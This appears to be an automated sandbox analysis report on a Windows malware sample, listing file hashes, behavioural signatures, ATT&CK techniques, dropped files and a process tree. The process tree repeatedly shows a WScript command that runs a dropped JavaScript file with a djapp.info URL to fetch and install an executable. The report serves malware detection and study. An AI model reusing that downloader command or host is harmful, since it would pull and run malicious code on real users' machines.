Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 11:06

General

  • Target

    34468ed13872fdebbfbdb29970ac83b7_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    34468ed13872fdebbfbdb29970ac83b7

  • SHA1

    33b3107ab58ac701523e5b9c3e020d7eeb5591aa

  • SHA256

    d405b115d0ad09642feba86a2bb090bcab367cd485208f12d24da85f6bc0e75c

  • SHA512

    5d4b2e5ef6c25e6e5b6161b1b6b30241db33671e3c064fe8b418c7c574cd84c6e8d80f122d7ab89fde6e30c4bd8e0384ce5e8a444c431f6d023cee382ae7b548

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3F6:/7BSH8zUB+nGESaaRvoB7FJNndnA6

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\34468ed13872fdebbfbdb29970ac83b7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\34468ed13872fdebbfbdb29970ac83b7_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC8E.js" http://www.djapp.info/?domain=yDWNGeKNSS.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufC8E.exe
      2⤵
      • Blocklisted process makes network request
      PID:2220
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC8E.js" http://www.djapp.info/?domain=yDWNGeKNSS.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufC8E.exe
      2⤵
      • Blocklisted process makes network request
      PID:2576
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC8E.js" http://www.djapp.info/?domain=yDWNGeKNSS.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufC8E.exe
      2⤵
      • Blocklisted process makes network request
      PID:2800
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC8E.js" http://www.djapp.info/?domain=yDWNGeKNSS.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufC8E.exe
      2⤵
      • Blocklisted process makes network request
      PID:2012
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC8E.js" http://www.djapp.info/?domain=yDWNGeKNSS.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufC8E.exe
      2⤵
      • Blocklisted process makes network request
      PID:1564

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    2a8fa256ce6a53132c6e1887aec2dd90

    SHA1

    3c3712696c81ffbf3f78767fa642115336718db0

    SHA256

    4372b48ab69f94556f8124623513fe956790e5250372c13577d51de0a309a2a6

    SHA512

    86c1a4da1b625219443ffa86cf04f4fa477746d0f1ff2de1c8c8605fcb4eed09b9aa3a7e7a64c8ad59c50b2a65bf25d5ef493bf9b06726ecb83aa9519ef9f11b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    cc5169d835492174f1f6676ebfcd6c35

    SHA1

    2b6bb570d85f8f80fb1dd3034ee91b92898842ac

    SHA256

    bff0872280cc368c9fdf8f4927822abe484106423293a8ebbfe3608f0739653a

    SHA512

    6c3d943d3ed911db8fa130de9f56caf46cfb6711ad094a434fabdec3de5dfcb19be0990e345fc922286c5ceacd20a0550a32eebbbf582db2c1cfc7842bc49eef

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    db172adfb5caea5fb604aa62990f6793

    SHA1

    0fb1c47a021deb61989eaf679b0dfbea86436c0e

    SHA256

    d85fbc125647fcf5ffd51e21d5955243d4723ac26802fc0c62052cd022e3ce88

    SHA512

    a8a8e3ea2c2d70d63063f5b8a323e4d6b52d218c139dba110ac123e7c60282d825e9113dd502d0994584e54ad57c622d0d93c0acc9b28c49f2fb08f44e2c2e10

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
    Filesize

    392B

    MD5

    e8c843931e2683be94f106fd9a85d35f

    SHA1

    ea7e922c64b8c6a827d6cedb42cb5feed01d3d93

    SHA256

    33de3db2d327eaa2867020c253df6de3b70372290f6ce60b354a66aa4be688b1

    SHA512

    5c4a28ded86fd9869658abcc9e789b023ee7e57c9165f645c73f642412ccc4f07c311ef5da16718cf3e8269916f4a50e08bcf3ce4425aceda254e21775c3c0dd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm
    Filesize

    40KB

    MD5

    47c66b89dc6ea8facc40d993b57d0ba1

    SHA1

    2e825efbbf347a83bffeedc49dfba41199aee662

    SHA256

    6378ae1927f73e396bb19df058924af7805581a5e5468d33ca30bee66a979b2a

    SHA512

    3f59d5cc734475aaf95824bf09f5cba3e9656fa2085d3f1f3f4338c6af2a376447d852c134441a467e4c541bccd2463d848f78387b7d651a2af2162dca8a4fb3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm
    Filesize

    40KB

    MD5

    34503eed86fa6c4bf8d316fbb64f2ab0

    SHA1

    decc6c4a685f002d0babe29fedb835a8950fa3d7

    SHA256

    90cc12f4281731dc9b2fc7a5efd9434f4482aebedc1dd1ebda05de07d7158db1

    SHA512

    33b6ff89ddbcae696518accddc079d30ab93d7b0f62633cb7eede6eba1f5dce9cec1fbde62cf80c495518905f09673eb7f5355602da94dc2754c180e3c4df2dd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm
    Filesize

    40KB

    MD5

    c4f46530610ead5ea58e4d805699dc18

    SHA1

    7afc56a833b3826015e7e0b37a8bc659478bae80

    SHA256

    37b839f723dc99f33d2e26007f7df21a59b3730f8b0260534ac7e3485ad6b3c7

    SHA512

    ec4a9e87ae1bb61dbddc320fab722572c96881df11f13d0229532aa63485c6261120a9e9358d188d151ecc52948e263f04a147a1e42cbac20190e1e96bf8cde3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm
    Filesize

    40KB

    MD5

    8e98a4b121cb56b54bed006d120799bc

    SHA1

    3aa441ea23d86125ba5996324cdae3e6f95769c3

    SHA256

    44bc7b659e91d4440633bb4ee51c877e023c2f4906c5fe21e3f93aba20afa980

    SHA512

    7d366b1648a05c1652602b7e09c2b7064f4f210ce9e0d4c4122166eb6959e8850614c9953b1209d33a72725b1e45cbbfc61d65ed5dbec8f99c665d918ef9fe1a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm
    Filesize

    40KB

    MD5

    97be33f35426b936ad21871e98e0cc3f

    SHA1

    dd153d66a735e7c68cce7a94859e1f737eb30b46

    SHA256

    f68a503d480636c7046febfe9a2f7cf696c521c8bd0a9c2b57306c6967456b0d

    SHA512

    db18c25dc96b907da9bd6f01654f32cf6e5dcc9fee95abf2935fbef49d8fb7f9194615b9174c573035de156ce3624de5de16f54259ba9482e99ee0dc43d9e92c

  • C:\Users\Admin\AppData\Local\Temp\Cab3B7A.tmp
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar53FB.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fufC8E.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\10FYIQP9.txt
    Filesize

    177B

    MD5

    fbccaeda07cc025471bb09296b215d71

    SHA1

    b43dad46c5feee23af87992dd683f1961b2cf1b6

    SHA256

    62ad7406ed192f83ab710c7e4393675dc46c109ca7f38874d7a7d426868647f1

    SHA512

    dae6307f55981deb0099d42b89b59fc1d9a9ecc12a869cb6d08910b1c203ba8bc6f9f2379c7b561892a5ccd3f268d07536ee58e3a27ffd44bd282259e6a20334